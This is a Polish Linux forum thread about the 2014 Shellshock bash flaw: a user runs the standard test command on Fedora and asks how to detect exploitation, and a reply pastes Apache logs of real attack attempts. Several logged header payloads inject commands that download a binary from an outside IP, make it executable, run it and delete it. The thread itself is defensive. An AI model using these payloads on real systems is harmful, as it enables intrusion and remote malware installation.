Skocz do zawartości

Czy Bash Jest Naprawdę Dziurawy?


WalDo

Rekomendowane odpowiedzi

Nie wiem czy czytaliście http://niebezpiecznik.pl/post/dziura-w-bashu/

 

Wykonałem jako zwykły user polecenie testujące:

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
O ile w F20

[waldo@F20 ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
this is a test
czyli - przynajmniej ja tak to rozumiem - jest bezpiecznie, to już w F21 tak fajnie nie jest:

[waldo@localhost ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
mimo, że na stronie https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ piszą

Update 2014-09-30 19:30 UTC

 

Questions have arisen around whether Red Hat products are vulnerable to CVE-2014-6277 and CVE-2014-6278. We have determined that RHSA-2014:1306, RHSA-2014:1311, and RHSA-2014:1312 successfully mitigate the vulnerability and no additional actions need to be taken.

Może jest tu na forum ktoś, kto specjalizuje się w bezpieczeństwie systemu i potrafi mi wyjaśnić dokładnie o co chodzi? Informacja z RH sugeruje, że wszystkie dziury zostały załatane, ale czy na pewno?

Czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury?

 

 

[EDIT]

Trochę zafałszowałem informację. Po zaktualizowaniu F21 wyglada na to, że F21 też jest OK, ale pytanie jest aktualne: czy można jakoś sprawdzić czy ktoś nie wykorzystał tej dziury?

 

Akutualizuję system często, w zasadzie na bieżąco, ale niepokoi mnie co się mogło dziać między 25. lipca a 26. września

[root@F20 log]# grep bash yum.log
Jul 25 19:17:50 Updated: bash-4.2.47-3.fc20.x86_64 # "dziurawa" wersja
Sep 26 13:43:59 Updated: bash-4.2.48-2.fc20.x86_64 # wersja "załatana"
No i oczywiście ewidentny wniosek: aktualizować system tak często jak to się da, choćby i 3 razy dziennie.

I jeszcze tylko pytanie czy jest jakiś sposób alarmowania o takich dziurach inny, lepszy niż śledzenie np. https://securityblog.redhat.com/ czy wspomnianego wyżej http://niebezpiecznik.pl/?

 

Jeszcze tylko lektura: http://niebezpiecznik.pl/post/chinczycy-juz-wykorzystuja-dziure-w-bashu-do-atakow/

Odnośnik do komentarza
Udostępnij na innych stronach

Możesz sprawdzić logi serwera www, jeżeli serwer nie wykonuje żadnych skryptów cgi ,php lub inne  które korzystają z basha to raczej nie masz się czego bać, dodatkowo jeżeli masz selinux to raczej bardzo mało prawdopodobne, aby ktoś wykorzystał dziurę http://danwalsh.livejournal.com/71122.html http://danwalsh.livejournal.com/71396.html

 

Próby wykorzystania błędu u mnie, logi z apacha

09.126.230.72 - - [25/Sep/2014:01:48:47 +0200] "GET / HTTP/1.0" 200 1933 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
89.207.135.125 - - [25/Sep/2014:10:38:27 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:15:10:11 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
54.251.83.67 - - [26/Sep/2014:04:34:41 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [26/Sep/2014:23:32:34 +0200] "GET / HTTP/1.1" 200 1933 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
70.42.149.69 - - [27/Sep/2014:09:44:44 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 404 213 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
66.150.114.30 - - [27/Sep/2014:10:35:47 +0200] "GET / HTTP/1.0" 200 1933 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""

Ciekawy artykuł o błędzie https://badsector.pl/w-praktyce/artykuly/shellshock-i-opowiesc-o-srodowisku.174.html

 

Co do stron proponuję również http://zaufanatrzeciastrona.pl/

Odnośnik do komentarza
Udostępnij na innych stronach

Dzięki za informacje. Mam tylko zwykła stację roboczą, nie wystawiam żadnych serwisów, więc pytanie z mojej strony ma przede wszystkim charakter poznawczy.

 

Na wszelki wypadek przeleciałem logi i nic szczególnego na szczęście nie znajduję :) SElinux działa, chociaż z tego co ktoś tu kiedyś napisał na forum SElinux na workstation to przerost formy nad treścią i można wyłączyć. Można i przez jakiś czas miałem nawet wyłączony, ale potem stwierdziłem, że jednak jak już jest, to niech działa - w sumie nie przeszkadza mi to, czasem wymaga dodania jakiejś regułki zazwyczaj "podpowiadanej", więc nie ma problemu.

 

Dzięki za linki.

Odnośnik do komentarza
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
×
×
  • Dodaj nową pozycję...